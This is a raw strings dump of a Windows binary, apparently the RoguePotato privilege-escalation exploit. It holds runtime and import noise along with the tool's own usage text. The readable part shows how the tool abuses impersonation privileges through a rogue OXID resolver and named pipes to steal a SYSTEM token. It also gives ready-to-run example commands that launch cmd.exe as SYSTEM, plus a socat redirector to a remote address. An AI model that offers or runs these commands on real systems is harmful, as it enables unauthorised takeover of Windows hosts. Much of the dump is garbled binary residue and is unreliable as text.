!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
s WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
L$ SVWH
L$ SUVWH
|$ AVH
|$ UATAUAVAWH
A_A^A]A\]
L$ SVWH
t$ UWATAUAWH
A_A]A\_]
H3E H3E
u0HcH<H
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
@A_A^A]A\_^]
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
ri9O vdH
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
@USVWATAVAWH
D8d$Xt
A_A^A\_^[]
D8t$8t
D8t$8t
D$@H;G
|$ AVH
D$0H;G
CA< t(<#t
CA< t(<#t
<htl<jt\<lt4<tt$<wt
!,X< w
<htl<jt\<lt4<tt$<wt
!,X< w
t$ WAVAWH
<Ct-<D
<StW@:
<g~{<itd<ntY<ot7<pt
<utT@:
D<P0@:
k4+kP+
0A_A^_
t$ WAVAWH
<Ct-<D
<StW@:
<g~{<itd<ntY<ot7<pt
<utT@:
D<P0@:
k(+sPL
0A_A^_
VWAUAVAWH
s4+sP+
A_A^A]_^
WAVAWH
A_A^_
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
x ATAVAWH
A_A^A\
@USVWATAVAWH
A_A^A\_^[]
u3HcH<H
UVWAVAWH
0A_A^_^]
WAVAWH
fA94@u
fA94nu
0A_A^_
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
x AUAVAWH
@A_A^A]
VWATAVAWH
?D8d$8t
D8d$8t
t'D8d$8t
%D8d$8t
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
L$ VWAVH
fD9t$b
@8l$Ht
L$ UVWH
WATAUAVAWH
gfffffffH
D8l$ht
A_A^A]A\_
8]8}KD
u)9\$ ~GH
UVWATAUAVAWH
@A_A^A]A\_^]
UVWATAUAVAWH
fA9<Cu
fC9<`u
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
UVWATAUAVAWH
L$&8\$&t,8Y
@A_A^A]A\_^]
WATAUAVAWH
fB94ht
xXI96tSI
fC94wu
0A_A^A]A\_
@UATAUAVAWH
e0A_A^A]A\]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
WAVAWH
A_A^_
UVWATAUAVAWH
D8T8>t
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ H
`A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
D+d$8H
#D8d$`t
A_A^A]A\_^[]
D$0H9D$8
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
H!T$0D
ue!T$(H!T$
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
@A_A^_^]
ffffff
fffffff
USVWAVH
A^_^[]
LcA<E3
u HcA<H
Unknown exception
bad allocation
bad array new length
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
CorExitProcess
CompareStringEx
GetSystemTimePreciseAsFileTime
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
ncacn_ip_tcp
[-] RpcServerUseProtseqEp() failed with status code %d
[-] RpcServerRegisterIf2() failed with status code %d
[-] RpcServerInqBindings() failed with status code %d
[-] RpcServerRegisterAuthInfoA() failed with status code %d
RoguePotato
[-] RpcEpRegister() failed with status code %d
[*] Starting RogueOxidResolver RPC Server listening on port %s ...
[-] RpcServerListen() failed with status code %d
[*] SecurityCallback RPC call
[*] ResolveOxid RPC call
[*] SimplePing RPC call
[*] ComplexPing RPC call
[*] ServerAlive RPC call
[*] ResolveOxid2 RPC call, this is for us!
localhost/pipe/%s[\pipe\epmapper]
NT AUTHORITY\NETWORK SERVICE
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:%s
[*] ServerAlive2 RPC Call
[*] IStoragetrigger written:%d bytes
InitializeSecurityDescriptor() failed. Error: %d
ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d
[-] Error CreatePipe %d
[*] Listening on pipe %S, waiting for client to connect
[*] Client connected!
[-] Failed to impersonate the client.%d %d
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
RoguePotato
@splinter_code & @decoder_it
Mandatory args:
-r remote_ip: ip of the remote machine to use as redirector
-e commandline: commandline of the program to launch
Optional args:
-l listening_port: This will run the RogueOxidResolver locally on the specified port
-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)
-z : this flag will randomize the pipename_placeholder (don't use with -p)
Examples:
- Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
- RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
- RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
- RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
[*] Calling CoGetInstanceFromIStorage with CLSID:%S
[!] Error. CLSID %S not found. Bad path to object.
[-] Error SetProcessWindowStation:%d
[-] Error open Desktop:%d
[-] Error SetProcessWindowStation2:%d
[-] Error add Ace Station:%d
[-] Error add Ace desktop:%d
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
[-] OpeProcessToken err:%d
[-] LookupPrivilege err:%d
[-] AdjustPrivilege err:%d
NtQuerySystemInformation
ntdll.dll
NtDuplicateObject
NtQueryObject
[-] Could not open PID %d!)
NtQuerySystemInformation failed!
[+] Got SYSTEM Token!!!
[-] Error duplicating Primary Token:%d
[-] Error duplicating ImpersonationToken:%d
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: %S
[*] Token does NOT have SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsWithToken() for launching: %S
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
_RDATA
.rsrc$01
.rsrc$02
HeapFree
GetLastError
HeapAlloc
GetProcessHeap
ReadFile
CreateNamedPipeW
WaitForSingleObject
GetCurrentThread
CloseHandle
CreateThread
ConnectNamedPipe
GetCurrentProcess
DuplicateHandle
GetModuleHandleA
OpenProcess
GetProcAddress
KERNEL32.dll
SetUserObjectSecurity
GetUserObjectSecurity
OpenWindowStationW
GetProcessWindowStation
OpenDesktopW
wsprintfW
GetUserObjectInformationW
SetProcessWindowStation
CloseDesktop
CloseWindowStation
USER32.dll
AddAccessAllowedAce
GetLengthSid
InitializeAcl
InitializeSecurityDescriptor
AddAce
CopySid
AllocateAndInitializeSid
GetAce
GetAclInformation
GetSecurityDescriptorDacl
SetSecurityDescriptorDacl
OpenThreadToken
ConvertStringSecurityDescriptorToSecurityDescriptorW
ImpersonateNamedPipeClient
GetTokenInformation
QueryServiceStatusEx
DuplicateTokenEx
OpenServiceW
CreateProcessAsUserW
OpenProcessToken
ImpersonateLoggedOnUser
CreateProcessWithTokenW
OpenSCManagerW
CloseServiceHandle
EqualSid
RevertToSelf
AdjustTokenPrivileges
LookupPrivilegeValueW
ADVAPI32.dll
CLSIDFromString
CoTaskMemAlloc
CoInitialize
CoUninitialize
StgCreateDocfileOnILockBytes
CreateILockBytesOnHGlobal
CoGetInstanceFromIStorage
ole32.dll
RpcServerRegisterAuthInfoA
RpcServerRegisterIf2
RpcEpRegisterA
RpcImpersonateClient
RpcServerListen
RpcServerUseProtseqEpA
RpcServerInqBindings
NdrServerCallAll
NdrServerCall2
RPCRT4.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
ntdll.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
RtlPcToFileHeader
RaiseException
SetLastError
EncodePointer
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetStdHandle
WriteFile
GetModuleFileNameW
GetCommandLineA
GetCommandLineW
CompareStringW
LCMapStringW
GetFileType
WideCharToMultiByte
HeapReAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
HeapSize
CreateFileW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AUIUnknown@@
.?AUIStorage@@
.?AVIStorageTrigger@@
.?AUIMarshal@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
{99fcfec4-5260-101b-bbcb-00aa0021347a}
{00000306-0000-0000-c000-000000000046}
hello.stg
D:(A;OICI;GA;;;WD)
[+] RoguePotato gave you the SYSTEM powerz :D
[-] RoguePotato something went wrong :-(
[-] Named pipe didn't received any connect request. Exiting ...
{4991d34b-80a1-4291-83b6-3328366b9097}
RoguePotato
Wrong Argument: %s
SeImpersonatePrivilege
[-] A privilege is missing: '%ws'. Exiting ...
\\.\pipe\%S\pipe\epmapper
{00000000-0000-0000-C000-000000000046}
default
%s\default
SeAssignPrimaryTokenPrivilege